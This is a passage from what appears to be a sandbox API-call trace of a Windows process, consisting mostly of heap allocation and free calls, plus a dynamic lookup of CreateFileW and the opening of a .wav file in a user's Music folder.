Flags=0x0, Size=0x8) returned 0x43e2410 [0110.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0110.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0110.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0110.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0110.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0110.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0110.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0110.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0110.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0110.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0110.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0110.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0110.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0110.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0110.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0110.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0110.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0110.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0110.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0110.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0110.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0110.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0110.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0110.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0110.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0110.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0110.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0110.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0110.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0110.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0110.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0110.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0110.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0110.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0110.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0110.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0110.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0110.168] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0110.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0110.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0110.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0110.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0110.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0110.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0110.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0110.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0110.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0110.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0110.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0110.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0110.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0110.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0110.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0110.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0110.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0110.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0110.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0110.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0110.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0110.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0110.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0110.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0110.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0110.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0110.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0110.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0110.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0110.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0110.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0110.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0110.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0110.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0110.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0110.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0110.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0110.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0110.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0110.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0110.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0110.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0110.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0110.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0110.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0110.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0110.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0110.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0110.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0110.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0110.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0110.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0110.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0110.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0110.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0110.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0110.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0110.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0110.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0110.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0110.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0110.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0110.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0110.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0110.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0110.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0110.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0110.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0110.171] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0110.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0110.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0110.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0110.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca460 [0110.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca460, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0110.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0110.171] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0110.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0110.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0110.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0110.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0110.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0110.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0110.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0110.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0110.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0110.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0110.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0110.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0110.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0110.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0110.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0110.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0110.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0110.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0110.172] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\fR5QK.wav" (normalized: "c:\\users\\fd1hvy\\music\\fr5qk.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0110.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0110.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0110.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0110.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0110.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0110.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0110.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0110.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0110.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0110.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0110.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0110.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0110.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0110.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0110.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0110.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0110.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0110.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0110.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0110.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0110.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0110.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0110.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0110.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0110.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0110.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0110.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0110.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0110.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0110.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0110.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0110.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0110.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0110.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0110.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0110.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0110.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0110.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0110.173] FreeLibrary (hLibModule=0x772d0000) returned 1 [0110.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0110.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0110.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0110.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0110.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0110.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0110.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0110.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0110.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0110.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0110.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0110.175] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0110.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0110.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0110.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0110.175] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0110.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0110.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0110.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0110.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0110.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0110.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0110.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0110.175] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0110.175] HeapFree (in: hHeap=0x1780000, 